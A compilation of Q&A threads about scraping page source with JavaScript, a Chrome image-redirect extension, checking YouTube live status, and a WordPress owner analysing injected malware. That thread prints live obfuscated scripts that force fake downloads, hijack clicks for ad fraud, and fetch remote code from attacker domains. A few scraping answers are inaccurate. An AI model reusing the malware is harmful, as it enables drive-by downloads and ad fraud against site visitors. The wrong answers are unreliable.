Can JavaScript read the source of any web page?

I am working on screen scraping and want to retrieve the source code of a particular page.
How can I achieve this with JavaScript? Please help me.

A simple way to start: try jQuery's .load():
$("#links").load("/Main_Page #jq-p-Getting-Started li");
More at the jQuery docs.
Another, much more structured way to do screen scraping is to use YQL (Yahoo Query Language). It returns the scraped data structured as JSON or XML.
e.g.
Let's scrape stackoverflow.com
select * from html where url="http://stackoverflow.com"
will give you a JSON array (I chose that option) like this:
"results": {
"body": {
"noscript": [
{
"div": {
"id": "noscript-padding"
}
},
{
"div": {
"id": "noscript-warning",
"p": "Stack Overflow works best with JavaScript enabled"
}
}
],
"div": [
{
"id": "notify-container"
},
{
"div": [
{
"id": "header",
"div": [
{
"id": "hlogo",
"a": {
"href": "/",
"img": {
"alt": "logo homepage",
"height": "70",
"src": "http://i.stackoverflow.com/Content/Img/stackoverflow-logo-250.png",
"width": "250"
}
……..
The beauty of this is that you can use projections and where clauses, which ultimately get you the scraped data structured and trimmed down to only the data you need (much less bandwidth over the wire, ultimately).
e.g.
select * from html where url="http://stackoverflow.com" and
xpath='//div/h3/a'
will get you
"results": {
"a": [
{
"href": "/questions/414690/iphone-simulator-port-for-windows-closed",
"title": "Duplicate: Is any Windows simulator available to test iPhone application? as a hobbyist who cannot afford a mac, i set up a toolchain kit locally on cygwin to compile objecti … ",
"content": "iphone\n simulator port for windows [closed]"
},
{
"href": "/questions/680867/how-to-redirect-the-web-page-in-flex-application",
"title": "I have a button control ....i need another web page to be redirected while clicking that button .... how to do that ? Thanks ",
"content": "How\n to redirect the web page in flex application ?"
},
…..
Now to get only the questions we do a
select title from html where url="http://stackoverflow.com" and
xpath='//div/h3/a'
Note the title in the projection.
"results": {
"a": [
{
"title": "I don't want the function to be entered simultaneously by multiple threads, neither do I want it to be entered again when it has not returned yet. Is there any approach to achieve … "
},
{
"title": "I'm certain I'm doing something really obviously stupid, but I've been trying to figure it out for a few hours now and nothing is jumping out at me. I'm using a ModelForm so I can … "
},
{
"title": "when i am going through my project in IE only its showing errors A runtime error has occurred Do you wish to debug? Line 768 Error:Expected')' Is this is regarding any script er … "
},
{
"title": "I have a java batch file consisting of 4 execution steps written for analyzing any Java application. In one of the steps, I'm adding few libs in classpath that are needed for my co … "
},
{
……
Once you write your query, it generates a URL for you:
http://query.yahooapis.com/v1/public/yql?q=select%20title%20from%20html%20where%20url%3D%22http%3A%2F%2Fstackoverflow.com%22%20and%0A%20%20%20%20%20%20xpath%3D'%2F%2Fdiv%2Fh3%2Fa'%0A%20%20%20%20&format=json&callback=cbfunc
in our case.
So ultimately you end up doing something like this:
$.getJSON(theAboveUrl, function(data) {
    var titleList = data.query.results.a; // the scraped titles
});
and play with it.
Beautiful, isn’t it?

JavaScript can be used, as long as you grab whatever page you're after via a proxy on your domain:
<html>
<head>
    <script src="/js/jquery-1.3.2.js"></script>
</head>
<body>
<script>
    $.get("http://www.mydomain.com/?url=www.google.com", function(response) {
        alert(response); // response is the proxied page's HTML
    });
</script>
</body>
</html>

You could simply use XMLHttpRequest (AJAX) to hit the required URL, and the HTML response from the URL will be available in the responseText property. If it's not the same domain, your users will receive a browser alert saying something like "This page is trying to access a different domain. Do you want to allow this?"
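A minimal sketch of that approach (the path /some/page.html is a placeholder for a same-origin URL):
var xhr = new XMLHttpRequest();
xhr.open("GET", "/some/page.html", true); // must be same-origin unless the server allows CORS
xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
        console.log(xhr.responseText); // the raw HTML of the page
    }
};
xhr.send();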

You can use fetch (note that cross-origin requests are still subject to CORS; the target server must allow them):
const URL = 'https://www.sap.com/belgique/index.html';
fetch(URL)
    .then(res => res.text())
    .then(text => {
        console.log(text);
    })
    .catch(err => console.log(err));

As a security measure, JavaScript can't read files from different domains. Though there might be some strange workaround for it, I'd consider a different language for this task.

If you absolutely need to use JavaScript, you could load the page source with an AJAX request.
Note that with JavaScript, you can only retrieve pages that are located under the same domain as the requesting page.

Using jQuery:
<html>
<head>
    <script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.js"></script>
</head>
<body>
<script>
    $.get("www.google.com", function(response) { alert(response); });
</script>
</body>
</html>

I used ImportIO. They let you request the HTML from any website if you set up an account with them (which is free). They let you make up to 50k requests per year. I didn't take the time to find an alternative, but I'm sure there are some.
In your JavaScript, you'll basically just make a GET request like this:
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
    // Wait for the request to complete successfully before reading the response
    if (request.readyState === 4 && request.status === 200) {
        var jsontext = request.responseText;
        alert(jsontext);
    }
};
request.open("GET", "https://extraction.import.io/query/extractor/THE_PUBLIC_LINK_THEY_GIVE_YOU?_apikey=YOUR_KEY&url=YOUR_URL", true);
request.send();
Sidenote: I found this question while researching what I felt like was the same question, so others might find my solution helpful.
UPDATE: I created a new one, which they only allowed me to use for less than 48 hours before saying I had to pay for the service. It seems they shut down your project pretty quickly now if you aren't paying. I made my own similar service with NodeJS and a library called NightmareJS. You can see their tutorial here and create your own web scraping tool. It's relatively easy. I haven't tried to set it up as an API that I could make requests to or anything.
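For what it's worth, a minimal NightmareJS sketch along those lines might look like this (the target URL is a placeholder, and this assumes Nightmare's documented goto/evaluate/end API):
const Nightmare = require('nightmare');
const nightmare = Nightmare({ show: false });

nightmare
    .goto('https://example.com')
    .evaluate(() => document.documentElement.outerHTML) // runs in the page, returns its HTML
    .end()
    .then(html => console.log(html))
    .catch(err => console.error(err));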

You can bypass the same-origin policy by creating a browser extension, or even by saving the file as an .hta (HTML Application) in Windows.
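To illustrate the extension route: with host permissions for the target origin, an extension's background script can fetch cross-origin without CORS errors. A rough sketch, assuming Manifest V3 and a placeholder URL:
// manifest.json (excerpt): "host_permissions": ["https://example.com/*"]
// background.js (service worker)
fetch('https://example.com/')
    .then(res => res.text())
    .then(html => console.log(html)); // the page source, readable thanks to host permissions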

Despite many comments to the contrary, I believe it is possible to overcome the same-origin requirement with simple JavaScript.
I am not claiming the following is original, because I believe I saw something similar elsewhere a while ago.
I have only tested this with Safari on a Mac.
The following demonstration fetches the page in the base tag and moves its innerHTML to a new window. My script adds html tags, but with most modern browsers this could be avoided by using outerHTML.
<html>
<head>
<base href='http://apod.nasa.gov/apod/'>
<title>test</title>
<style>
body { margin: 0 }
textarea { outline: none; padding: 2em; width: 100%; height: 100% }
</style>
</head>
<body onload="w=window.open('#'); x=document.getElementById('t'); a='<html>\n'; b='\n</html>'; setTimeout('x.innerHTML=a+w.document.documentElement.innerHTML+b; w.close()',2000)">
<textarea id=t></textarea>
</body>
</html>

javascript:alert("Inspect Element On");
javascript:document.body.contentEditable = 'true';
document.designMode='on';
void 0;
javascript:alert(document.documentElement.innerHTML);
Highlight this, drag it to your bookmarks bar, and click it when you want to edit and view the current site's source code.

You can create an XMLHttpRequest, request the page, and then read its responseText property to get the content.

You can use the FileReader API to get a file, and when selecting a file, put the URL of your web page into the selection box.
Use this code:
function readFile() {
    var f = document.getElementById("yourfileinput").files[0];
    if (f) {
        var r = new FileReader();
        r.onload = function(e) {
            alert(r.result);
        };
        r.readAsText(f);
    } else {
        alert("file could not be found");
    }
}

jQuery is not the way of doing things. Do it in pure JavaScript:
var r = new XMLHttpRequest();
r.open('GET', 'http://yahoo.com', false); // synchronous request; same-origin restrictions still apply
r.send(null);
if (r.status == 200) { alert(r.responseText); }

<script>
$.getJSON('http://www.whateverorigin.org/get?url=' + encodeURIComponent('https://example.com/') + '&callback=?', function (data) {
    alert(data.contents);
});
</script>
Include jQuery and use this code to get the HTML of another website. Replace example.com with your website.
This method involves an external server fetching the site's HTML and sending it to you. :)
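The same idea without jQuery, as a sketch; this assumes the whateverorigin.org endpoint above is still up and returns plain JSON when no callback parameter is passed (if it only supports JSONP, stick with the $.getJSON version):
fetch('http://www.whateverorigin.org/get?url=' + encodeURIComponent('https://example.com/'))
    .then(res => res.json())
    .then(data => console.log(data.contents)) // the proxied page's HTML
    .catch(err => console.log(err));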

On Linux:
download SlimerJS (slimerjs.org)
download Firefox version 59
add this environment variable: export SLIMERJSLAUNCHER=/home/en/Letöltések/firefox59/firefox/firefox
on the SlimerJS download page, use this .js program (./slimerjs program.js):
var page = require('webpage').create();
page.open(
    'http://www.google.com/search?q=görény',
    function()
    {
        page.render('goo2.pdf');
        phantom.exit();
    }
);
Use pdftotext to get text on the page.
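Alternatively, assuming SlimerJS implements PhantomJS's page.content property (it aims for API compatibility), you could dump the HTML source directly and skip the PDF step:
var page = require('webpage').create();
page.open('http://www.google.com/search?q=görény', function() {
    console.log(page.content); // the rendered page's HTML source
    phantom.exit();
});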

const URL = 'https://www.w3schools.com';
fetch(URL)
    .then(res => res.text())
    .then(text => {
        console.log(text);
    })
    .catch(err => console.log(err));

Related

Intercept and replace images in web app with Chrome extension

I am attempting to write a chrome extension (for personal use) to swap/replace images loaded by a webpage with alternate images. I'd had this working for some time using chrome.webRequest, but am attempting to bring it up-to-speed with manifest v3.
My general solution is that I am hosting my replacement images on my own server, including a script to retrieve as json a list of such images. I fetch that list and, for each image, create a dynamic redirect rule with chrome.declarativeNetRequest.updateDynamicRules.
This all works beautifully if I request an image to be replaced in a main frame. I can see the successful match with an onRuleMatchedDebug listener, and (of course) the path is dutifully redirected.
However, when I load the web app that in turn loads the image (with javascript, presumably with xmlhttprequest?), the redirect rule does not trigger. The initiator (a javascript source file) is on the same domain and similar path to the images being replaced.
//manifest.json
{
    "name": "Image replace",
    "description": "Replace images in web app",
    "version": "2.0",
    "manifest_version": 3,
    "background": {"service_worker": "background.js"},
    "permissions": [
        "declarativeNetRequestWithHostAccess",
        // "declarativeNetRequestFeedback" // Not necessary once tested
    ],
    "host_permissions" : [
        // "https://domain1.com/outerframe/*", // Not necessary
        "https://domain2.com/innerframe/*",
        "https://domain3.com/*",
        "https://myexample.com/*"
    ]
}
// background.js
//chrome.declarativeNetRequest.onRuleMatchedDebug.addListener((info) => console.log(info)); // Not necessary once tested
var rules = [];
var idx = 1;
fetch("https://myexample.com/list") // returns json list like: ["subdir1\/image1.png", "subdir1\/image2.png", "subdir2\/image1.png"]
    .then((response) => response.json())
    .then((data) => {
        console.log(data);
        for (const path of data) {
            var src = "https://domain2.com/innerframe/v*/files/" + path; // wildcards a version number
            var dst = "https://myexample.com/files/" + path;
            rules.push({
                "id" : idx++,
                "action" : {
                    "type": "redirect",
                    "redirect": {
                        "url": dst
                    }
                },
                "condition" : {
                    "urlFilter": src,
                    // In the end I only needed main_frame, image, and not xmlhttprequest
                    "resourceTypes": ["main_frame", "image"]
                }
            });
        }
        chrome.declarativeNetRequest.updateDynamicRules({"addRules": rules, "removeRuleIds" : rules.map(r => r.id)});
    });
Again, this DOES all work IF I load a source image directly in chrome, but fails when it's being loaded by the javascript app.
I also attempted to test the match by specifying the proper initiator with testMatchOutcome, but my browser seems to claim this API does not exist. Not at all sure what could be wrong here.
// snippet attempted after above updateDynamicRules call
chrome.declarativeNetRequest.testMatchOutcome({
    "initiator": "https://domain2.com/innerframe/files/script.js",
    "type": "xmlhttprequest",
    "url": "https://domain2.com/innerframe/v001/files/subdir/image1.png"
}, (outcome) => console.log(outcome));
I would expect a redirect to "https://myexample.com/files/subdir/image1.png"
Instead, I get this error:
Uncaught (in promise) TypeError: chrome.declarativeNetRequest.testMatchOutcome is not a function
Documentation https://developer.chrome.com/docs/extensions/reference/declarativeNetRequest/#method-testMatchOutcome says it's supported in chrome 103+. I'm running chrome 108.0.5359.72
Thanks!
Edit: Example code updated to reflect my answer below.
I've managed to work out why direct requests were redirected while script loaded ones were not. My problem was with the initiator and host permissions. I had been relying on Chrome developer tools to provide the initiator, which in the above example originated with domain2.com. However, the actual host permission I needed was from a third domain (call it domain3.com), which seems to be the source of the content that loaded scripts from domain2.com.
I discovered this when I recalled that host permissions allow "<all_urls>", which is not a good idea long term, but it did allow the redirects to complete. From there, my onRuleMatchedDebug listener could fire and log to the console the characteristics of the redirect, which showed me the proper initiator I was missing.
Having a concise view of the redirects I need, I can now truncate some of these options to only the ones actually needed (edited in original question).
Subsequent to that I thought to look back at the HTTP requests in developer tools and inspect the Referer header, which also had what I was needing.
So, silly oversights aside, I would like to leave this question open a little while longer in case anyone has any idea why chrome.declarativeNetRequest.testMatchOutcome seems unavailable in Chrome 108.0.5359.72 but is documented for 103+. I'd chalk it up to the documentation just being wrong, but it seems this function must have shipped at some point and somehow was erroneously removed? Barring any insights, I might just submit it as a bug.
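For anyone debugging a similar case, the diagnostic setup described above boils down to something like this sketch (it needs the declarativeNetRequestFeedback permission, "<all_urls>" in host_permissions as a temporary catch-all, and note that onRuleMatchedDebug only fires for unpacked extensions):
// background.js, temporary diagnostics only
chrome.declarativeNetRequest.onRuleMatchedDebug.addListener((info) => {
    // Logs the matched request's URL and its true initiator
    console.log('matched:', info.request.url, 'initiator:', info.request.initiator);
});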

Malicious code asmr9999 / fastjscdn in Wordpress uses FileSaver.js and jszip

Scanning my site with PageSpeed shows that it is loading malicious files in the background.
The problem happens occasionally, not all the time; sometimes the site loads the malicious script, other times it doesn't. I don't know what it depends on.
In particular, the following JS script is loaded from this link: "https:// asmr9999. live/static.js" (without spaces). So the malicious code is loaded indirectly.
if(!window.xxxyyyzzz){function e(){return -1!==["Win32","Win64","Windows","WinCE"].indexOf(window.navigator?.userAgentData?.platform||window.navigator.platform)}function n(n){if(!e())return!1;var t="File",a=n.target.closest("a");if(window.location.href.indexOf("3axis.co")>=0){if(0>a.parentElement.className.indexOf("post-subject")&&0>a.parentElement.className.indexOf("img"))return!1;t=a.children.length>0?a.children[0].alt:a.innerText}else{if(!(window.location.href.indexOf("thesimscatalog.com")>=0)||0>a.parentElement.className.indexOf("product-inner"))return!1;t=a.children[1].innerText}var i=document.createElement("a");return i.style="display:none",i.href="https://yhdmb.xyz/download/"+t+" Downloader.zip",document.body.append(i),i.click(),n.preventDefault(),!0}function t(e){var n=document.createElement("script");n.src=e,document.head.appendChild(n)}function a(e,n,t){var a="";if(t){var i=new Date;i.setTime(i.getTime()+36e5*t),a="; expires="+i.toUTCString()}document.cookie=e+"="+(n||"")+a+"; path=/"}function i(e){for(var n=e+"=",t=document.cookie.split(";"),a=0;a<t.length;a++){for(var i=t[a];" "==i.charAt(0);)i=i.substring(1,i.length);if(0==i.indexOf(n))return i.substring(n.length,i.length)}return null}function r(e){var t=e.target.closest("a");null!==t&&(n(e)||!i("__ads__opened")&&window._ads_goto&&(a("__ads__opened","1",6),"_blank"==t.target||(e.preventDefault(),window.open(t.href)),setTimeout(function(){window.location=window._ads_goto},500)),window.removeEventListener("click",r))}t("https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"),t("https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js"),window.addEventListener("click",r,{capture:!0}),window.addEventListener("message",function(e){e.data&&e.data instanceof Object&&e.data._ads_goto&&(window._ads_goto=e.data._ads_goto)}),window.xxxyyyzzz=function(e){var n=document.createElement("div"),t=document.createElement("iframe");t.src=e,n.style.display="none",n.appendChild(t),window.addEventListener("load",function(){document.body.append(n)})},window.xxxyyyzzz("https://yhdmb.xyz/vp/an.html")}
From this code, is it possible to understand where the malware is located on my Wordpress site? And is it also possible to understand what exactly this code does?
I have seen that it also uses these scripts,
https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js
which are respectively:
https://stuk.github.io/jszip/
https://github.com/eligrey/FileSaver.js/
EDIT 1: I found that it loads just before "</body>":
<script src="https://asmr9999.live/static.js?hash=a633f506a53746a846742c5655ebf596"></script></body></html>
EDIT 2: I installed https://wordpress.org/plugins/string-locator/ to search for asmr9999 across the whole site, including its Base64-encoded form "YXNtcjk5OTk", but found nothing. I also tried https://wordpress.org/plugins/gotmls/ , nothing.
EDIT 3: I've only found one person on the internet who has the same problem, at this link (remove space):
https:// boards.4channel. org/g/thread/89699524/i-had-a-virus-on-my-server-ot-attack-in-my-server
EDIT 4: I also analyzed the malicious link in the script, https:// yhdmb. xyz/vp/an.html. It is an HTML page containing this code:
<html lang="en">
<head>
    <title>YHDM</title>
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8724126396282572"
            crossorigin="anonymous"></script>
    <script src="https://cdn.fluidplayer.com/v2/current/fluidplayer.min.js"></script>
</head>
<body>
<script>
function setCookie(name, value, hours) {
    var expires = "";
    if (hours) {
        var date = new Date();
        date.setTime(date.getTime() + (hours*60*60*1000));
        expires = "; expires=" + date.toUTCString();
    }
    document.cookie = name + "=" + (value || "") + expires + "; path=/;SameSite=None; Secure";
}
function addVast(id, url, prob, type) {
    var div = document.createElement('div');
    var video = document.createElement('video');
    var source = document.createElement('source');
    source.type = 'video/mp4';
    source.src = 'video.mp4';
    video.id = 'my-video' + id;
    video.append(source);
    div.appendChild(video);
    document.body.append(div);
    var testVideo = fluidPlayer(
        "my-video" + id,
        {
            layoutControls: {
                autoPlay: true
            },
            vastOptions: {
                "adList": [
                    {
                        "roll": "preRoll",
                        "vastTag": url
                    },
                    {
                        "roll": "midRoll",
                        "vastTag": url,
                        "timer": 8
                    },
                    {
                        "roll": "midRoll",
                        "vastTag": url,
                        "timer": 10
                    },
                    {
                        "roll": "postRoll",
                        "vastTag": url
                    }
                ]
            }
        }
    );
    setTimeout(function () {
        testVideo.play();
        testVideo.setVolume(0);
        function tryClickAds() {
            setTimeout(function () {
                if (testVideo.vastOptions && testVideo.vastOptions.clickthroughUrl) {
                    var url = testVideo.vastOptions.clickthroughUrl;
                    if (type == 'nw') {
                        setCookie('redirect', url, 1);
                        console.log(url);
                        window.parent.postMessage({'_ads_goto': window.location.href}, '*');
                    } else {
                        var adsIframe = document.createElement('iframe');
                        adsIframe.src = url;
                        adsIframe.style = 'height:100%;width:100%';
                        adsIframe.sandbox = 'allow-forms allow-orientation-lock allow-pointer-lock allow-presentation allow-same-origin allow-scripts';
                        document.body.appendChild(adsIframe);
                    }
                } else {
                    tryClickAds()
                }
            }, 1000)
        }
        if (Math.random() < prob) {
            tryClickAds()
        }
    }, 500);
}
addVast('1', 'https://wyglyvaso.com/ddmxF.ztdoG-N/v/ZxGmUY/bejmS9ku/ZdUll/klPpTRQG1iNozIcs2/NTTvAQtmNIDPUZ3YN/zXYP1LMWQI', 1, 'nw');
addVast('2', 'https://syndication.exdynsrv.com/splash.php?idzone=4840778', 0.5, 'nw');
</script>
</body>
</html>
EDIT 5: I restored a backup from September. The malicious code is still there, but slightly different. It still loads before "</body>", but the JS code is different and it uses another domain, "fastjscdn .org", instead of "asmr9999 .live". How is it possible that it can change domain?
<script src="https://fastjscdn.org/static.js?hash=1791f07709c2e25e84d84a539f3eb034"></script></body>
The JS code contains:
window.xxxyyyzzz||(window.xxxyyyzzz="1",function(){if(function t(){try{return window.self!==window.top}catch(r){return!0}}()){var t=window.parent.document.createElement("script");t.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(t);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{})}());
You can find out what the initiator of any loaded file was. Open the developer console (Ctrl+Shift+I in Chrome) and choose the Network tab. After loading the page with the Network tab open, all loaded files will be listed there. Locate your file and check the Initiator column.
But there is a scenario where it is loaded from the DOM. In that case the next step is to go to Elements, press Ctrl+F and search for the script. This still may not be your solution, though; it could be inserted into the HTML of your webpage by any malicious plugin.
I prefer (at least if you are able to log into the Wordpress admin) using a useful scanning plugin, e.g. Anti-Malware Security and Brute-Force Firewall or some other scanning tool. It will probably find the concrete file/directory where the malicious code lives.
I have exactly the same issue on a CentOS VPS server with a custom CMS. I am using an Apache + nginx + PHP 5.6 configuration. My investigations are the following:
I compared all my site scripts with the scripts from my previous backup and there are no changes in the site scripts!
I checked all files on my server for the string "asmr9999" and the same string encoded in Base64 (YXNtcjk5OTk): the strings were not found. I also created an SQL database dump, but the dump doesn't contain these strings either!
I checked the site using the ClamAV antivirus and the maldet tool, and no issues were found.
Finally, I rebooted the server, and the "<script src="https:// asmr9999 .live">" scripts were gone from all my site pages! But after about an hour, the scripts appeared on my site pages again.
So it seems that the script is located only in RAM and disappears during a server reboot. Then, after an hour, perhaps a crontab entry loads the script into RAM again from some hiding place.
I hope this saves you some time, and together we will resolve this issue.
I am continuing the investigation.
Makes me think of Linux rootkits from 10 years ago (!) such as Snakso, which injected malicious iframes directly into the outgoing HTTP traffic of the server.
The problem and solution are described here: https://stackoverflow.com/a/74921192/14686582
My Memcached server was public and infected with malicious code; it was a "cache-side" XSS attack.

How to check if a youtube livestream is active (by YT-id)? [duplicate]

I can't find any information on how to check whether a YouTube channel is actually streaming or not.
With Twitch you just need the channel name, and with the API you can check if there is a live stream or not.
I don't want to use OAuth; normally a public API key is enough. Just as I can list the videos of a channel, I want to know if the channel is streaming.
You can do this by using search.list, specifying the channel ID, setting the type to video, and setting eventType to live.
For example, when I searched for:
https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=UCXswCcAMb5bvEUIDEzXFGYg&type=video&eventType=live&key=[API_KEY]
I got the following:
{
    "kind": "youtube#searchListResponse",
    "etag": "\"sGDdEsjSJ_SnACpEvVQ6MtTzkrI/gE5P_aKHWIIc6YSpRcOE57lf9oE\"",
    "pageInfo": {
        "totalResults": 1,
        "resultsPerPage": 5
    },
    "items": [
        {
            "kind": "youtube#searchResult",
            "etag": "\"sGDdEsjSJ_SnACpEvVQ6MtTzkrI/H-6Tm7-JewZC0-CW4ALwOiq9wjs\"",
            "id": {
                "kind": "youtube#video",
                "videoId": "W4HL6h-ZSws"
            },
            "snippet": {
                "publishedAt": "2015-09-08T11:46:23.000Z",
                "channelId": "UCXswCcAMb5bvEUIDEzXFGYg",
                "title": "Borussia Dortmund vs St. Pauli 1-0 Live Stream",
                "description": "Borussia Dortmund vs St. Pauli Live Stream Friendly Match.",
                "thumbnails": {
                    "default": {
                        "url": "https://i.ytimg.com/vi/W4HL6h-ZSws/default.jpg"
                    },
                    "medium": {
                        "url": "https://i.ytimg.com/vi/W4HL6h-ZSws/mqdefault.jpg"
                    },
                    "high": {
                        "url": "https://i.ytimg.com/vi/W4HL6h-ZSws/hqdefault.jpg"
                    }
                },
                "channelTitle": "",
                "liveBroadcastContent": "live"
            }
        }
    ]
}
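In JavaScript, a minimal check against that response might look like this sketch (the API key is a placeholder; the channel ID is the one from the example above):
const key = 'YOUR_API_KEY';
const channelId = 'UCXswCcAMb5bvEUIDEzXFGYg';
fetch(`https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=${channelId}&type=video&eventType=live&key=${key}`)
    .then(res => res.json())
    .then(data => {
        // One or more items with eventType=live means the channel is streaming
        const isLive = data.items && data.items.length > 0;
        console.log(isLive ? 'channel is live' : 'channel is offline');
    });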
The search-method (https://www.googleapis.com/youtube/v3/search) is awfully expensive to use though. It costs 100 quota units (https://developers.google.com/youtube/v3/determine_quota_cost) out of the 10,000 you have by default.
This means you only get 100 requests per day, which is terrible.
You could request an increase in the quota, but that seems like brute-forcing the problem.
Is there really no simpler method?
I know this is old, but I figured it out myself with PHP.
$API_KEY = 'your api3 key';
$ChannelID = 'the users channel id';
$channelInfo = 'https://www.googleapis.com/youtube/v3/search?part=snippet&channelId='.$ChannelID.'&type=video&eventType=live&key='.$API_KEY;
$extractInfo = file_get_contents($channelInfo);
$extractInfo = str_replace('},]', "}]", $extractInfo);
$showInfo = json_decode($extractInfo, true);
if ($showInfo['pageInfo']['totalResults'] === 0) {
    echo 'Users channel is Offline';
} else {
    echo 'Users channel is LIVE!';
}
Guys, I found a better way to do this. Yes, it requires you to make GET requests to a YouTube page and parse HTML, but it works with newer versions + works with consent + works with captcha (most likely, 90%).
All you need to do is make a request to https://youtube.com/channel/[CHANNELID]/live and check the href attribute of the <link rel="canonical" /> tag.
For example,
<link rel="canonical" href="https://www.youtube.com/channel/UC4cueEAH9Oq94E1ynBiVJhw">
means there is no livestream, while
<link rel="canonical" href="https://www.youtube.com/watch?v=SR9w_ofpqkU">
means there is a stream, and you can even fetch its data by videoid.
Since the canonical URL is very important for SEO, and the redirect no longer works in GET or HEAD requests, I recommend using my method.
Also here is the simple script I use:
import { parse } from 'node-html-parser'
import fetch from 'node-fetch'
const channelID = process.argv[2] // process.argv is array of arguments passed in console
const response = await fetch(`https://youtube.com/channel/${channelID}/live`)
const text = await response.text()
const html = parse(text)
const canonicalURLTag = html.querySelector('link[rel=canonical]')
const canonicalURL = canonicalURLTag.getAttribute('href')
const isStreaming = canonicalURL.includes('/watch?v=')
console.log(isStreaming)
Then run npm init -y && npm i node-html-parser node-fetch to create a project in the working directory and install the dependencies.
Then run node isStreaming.js UC4cueEAH9Oq94E1ynBiVJhw and it will print true/false (400-600 ms per execution).
It does require you to depend on node-html-parser and node-fetch, but you can make requests with the built-in HTTP library (which sucks) and rewrite this to use regex. (Do not parse HTML with regex.)
I was also struggling with API limits. The most reliable and cheapest way I've found was simply a HEAD request to https://www.youtube.com/channel/CHANNEL_ID/live. If the channel is live, it will auto-load the stream; if not, it will load the channel's videos feed. You can simply check the Content-Length header size to determine which. When live, the size is almost 2x that of when NOT live.
And depending on your region you might need to accept the cookies consent page. Just send your request with cookies={ "CONSENT": "YES+cb.20210420-15-p1.en-GB+FX+634" }.
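A sketch of that HEAD-request heuristic in Node (node-fetch assumed; the size threshold is empirical, so calibrate it against your target channel):
import fetch from 'node-fetch'

const res = await fetch('https://www.youtube.com/channel/CHANNEL_ID/live', {
    method: 'HEAD',
    headers: { cookie: 'CONSENT=YES+cb.20210420-15-p1.en-GB+FX+634' }
})
// Per the observation above, the live page is almost 2x the size of the offline feed
console.log('content-length:', res.headers.get('content-length'))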
if you point streamlink at a https://www.youtube.com/channel/CHANNEL_ID/live link, it will tell you if it is live or not
e.g. lofi beats is usually live,
$ streamlink "https://www.youtube.com/channel/UCSJ4gkVC6NrvII8umztf0Ow/live"
[cli][info] Found matching plugin youtube for URL https://www.youtube.com/channel/UCSJ4gkVC6NrvII8umztf0Ow/live
Available streams: 144p (worst), 240p, 360p, 480p, 720p, 1080p (best)
whereas MKBHD is not
$ streamlink "https://www.youtube.com/c/mkbhd/live"
[cli][info] Found matching plugin youtube for URL https://www.youtube.com/c/mkbhd/live
error: Could not find a video on this page
The easiest way that I have found to do this has been scraping the site. This can be done by finding this:
<link rel="canonical" href="linkToActualYTLiveVideoPage">
as in Vitya's answer.
This is my simple Python code using bs4:
import requests
from bs4 import BeautifulSoup

def is_liveYT():
    channel_url = "https://www.youtube.com/c/LofiGirl/live"
    page = requests.get(channel_url, cookies={'CONSENT': 'YES+42'})
    soup = BeautifulSoup(page.content, "html.parser")
    # The canonical link is present either way; when live, its href points
    # at a /watch page (per Vitya's answer), so check the href, not just existence
    live = soup.find("link", {"rel": "canonical"})
    if live and "/watch?v=" in live.get("href", ""):
        print("Streaming")
    else:
        print("Not Streaming")

if __name__ == "__main__":
    is_liveYT()
It is pretty weird, honestly, that YouTube doesn't have a simple way to do this through the API, although this is probably easier.
I found the answer by #VityaSchel to be quite useful, but it doesn't distinguish between channels which have a live broadcast scheduled, and those which are broadcasting live now.
To distinguish between scheduled and live, I have extended his code to access the YouTube Data API to find the live streaming details:
import { parse } from 'node-html-parser'
import fetch from 'node-fetch'
const youtubeAPIkey = 'YOUR_YOUTUBE_API_KEY'
const youtubeURLbase = 'https://www.googleapis.com/youtube/v3/videos?key=' + youtubeAPIkey + '&part=liveStreamingDetails,snippet&id='
const c = {cid: process.argv[2]} // process.argv is array of arguments passed in console
const response = await fetch(`https://youtube.com/channel/${c.cid}/live`)
const text = await response.text()
const html = parse(text)
const canonicalURLTag = html.querySelector('link[rel=canonical]')
const canonicalURL = canonicalURLTag.getAttribute('href')
c.live = false
c.configured = canonicalURL.includes('/watch?v=')
if (!c.configured) process.exit()
c.vid = canonicalURL.match(/(?<==).*/)[0]
const data = await fetch(youtubeURLbase + c.vid).then(response => response.json())
if (data.error) {
    console.error(data)
    process.exit(1)
}
const i = data.items.pop() // pop() grabs the last item
c.title = i.snippet.title
c.thumbnail = i.snippet.thumbnails.standard.url
c.scheduledStartTime = i.liveStreamingDetails.scheduledStartTime
c.live = i.liveStreamingDetails.hasOwnProperty('actualStartTime')
if (c.live) {
    c.actualStartTime = i.liveStreamingDetails.actualStartTime
}
console.log(c)
Sample output from the above:
% node index.js UCNlfGuzOAKM1sycPuM_QTHg
{
  cid: 'UCNlfGuzOAKM1sycPuM_QTHg',
  live: true,
  configured: true,
  vid: '8yRgYiNH39E',
  title: '🔴 Deep Focus 24/7 - Ambient Music For Studying, Concentration, Work And Meditation',
  thumbnail: 'https://i.ytimg.com/vi/8yRgYiNH39E/sddefault_live.jpg',
  scheduledStartTime: '2022-05-23T01:25:00Z',
  actualStartTime: '2022-05-23T01:30:22Z'
}
Every YouTube channel has a permanent livestream, even if the channel is currently not actively livestreaming. In the liveStream resource, you can find a boolean named isDefaultStream.
But where can we get this video (livestream) ID? Go to https://www.youtube.com/user/CHANNEL_ID/live, right-click on the stream and copy the video URL.
You can now make a GET request to
https://youtube.googleapis.com/youtube/v3/videos?part=liveStreamingDetails&id=[VIDEO_ID]&key=[API_KEY] (this request has a quota cost of 1 unit, see here)
This will be the result if the stream is currently active/online.
{
    "kind": "",
    "etag": "",
    "items": [
        {
            "kind": "",
            "etag": "",
            "id": "",
            "liveStreamingDetails": {
                "actualStartTime": "",
                "scheduledStartTime": "",
                "concurrentViewers": "",
                "activeLiveChatId": ""
            }
        }
    ],
    "pageInfo": {
        "totalResults": 1,
        "resultsPerPage": 1
    }
}
